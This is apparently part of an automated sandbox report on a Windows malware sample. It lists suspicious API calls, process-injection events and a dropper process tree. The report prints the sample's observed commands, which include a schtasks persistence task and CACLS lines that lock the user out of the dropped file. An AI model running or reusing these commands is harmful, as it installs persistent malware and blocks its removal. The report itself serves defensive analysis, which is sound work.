N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1492 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1492 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1492 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1492 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1492 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1492 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3180 wrote to memory of 4232 N/A N/A C:\Users\Admin\AppData\Local\Temp\B611.exe
PID 3180 wrote to memory of 4232 N/A N/A C:\Users\Admin\AppData\Local\Temp\B611.exe
PID 3180 wrote to memory of 4232 N/A N/A C:\Users\Admin\AppData\Local\Temp\B611.exe
PID 4232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\B611.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 4232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\B611.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 4232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\B611.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 3024 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 3024 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 3024 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 4440 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 4440 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 4440 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 3180 wrote to memory of 4372 N/A N/A C:\Users\Admin\AppData\Local\Temp\B883.exe
PID 3180 wrote to memory of 4372 N/A N/A C:\Users\Admin\AppData\Local\Temp\B883.exe
PID 3180 wrote to memory of 4372 N/A N/A C:\Users\Admin\AppData\Local\Temp\B883.exe
PID 4800 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 4800 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 4800 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 1048 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe
PID 1048 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe
PID 1048 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe
PID 3180 wrote to memory of 3936 N/A N/A C:\Users\Admin\AppData\Local\Temp\B96F.bat
PID 3180 wrote to memory of 3936 N/A N/A C:\Users\Admin\AppData\Local\Temp\B96F.bat
PID 3180 wrote to memory of 3936 N/A N/A C:\Users\Admin\AppData\Local\Temp\B96F.bat
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4372 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\B883.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3896 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3180 wrote to memory of 4808 N/A N/A C:\Users\Admin\AppData\Local\Temp\BC5E.exe
PID 3180 wrote to memory of 4808 N/A N/A C:\Users\Admin\AppData\Local\Temp\BC5E.exe
PID 3180 wrote to memory of 4808 N/A N/A C:\Users\Admin\AppData\Local\Temp\BC5E.exe
PID 3936 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\B96F.bat C:\Windows\system32\cmd.exe
PID 3936 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\B96F.bat C:\Windows\system32\cmd.exe
PID 3180 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\BDA7.exe
PID 3180 wrote to memory of 2240 N/A N/A C:\Users\Admin\AppData\Local\Temp\BDA7.exe
PID 3180 wrote to memory of 2536 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFF9.exe
PID 3180 wrote to memory of 2536 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFF9.exe
PID 3180 wrote to memory of 2536 N/A N/A C:\Users\Admin\AppData\Local\Temp\BFF9.exe
PID 4808 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\BC5E.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4808 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\BC5E.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4808 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\BC5E.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4808 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\BC5E.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe

"C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1492 -ip 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 268

C:\Users\Admin\AppData\Local\Temp\B611.exe

C:\Users\Admin\AppData\Local\Temp\B611.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

C:\Users\Admin\AppData\Local\Temp\B883.exe

C:\Users\Admin\AppData\Local\Temp\B883.exe

C:\Users\Admin\AppData\Local\Temp\B96F.bat

"C:\Users\Admin\AppData\Local\Temp\B96F.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4372 -ip 4372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3896 -ip 3896

C:\Users\Admin\AppData\Local\Temp\BC5E.exe

C:\Users\Admin\AppData\Local\Temp\BC5E.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BAA5.tmp\BAA6.tmp\BAA7.bat C:\Users\Admin\AppData\Local\Temp\B96F.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 384

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4720 -ip 4720

C:\Users\Admin\AppData\Local\Temp\BDA7.exe

C:\Users\Admin\AppData\Local\Temp\BDA7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 540

C:\Users\Admin\AppData\Local\Temp\BFF9.exe

C:\Users\Admin\AppData\Local\Temp\BFF9.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4808 -ip 4808

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2BY150Kr.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2BY150Kr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 420

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbd8e346f8,0x7ffbd8e34708,0x7ffbd8e34718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbd8e346f8,0x7ffbd8e34708,0x7ffbd8e34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16731533183165092085,17358325908919750114,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16731533183165092085,17358325908919750114,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17172761381636216648,17385396480596858462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

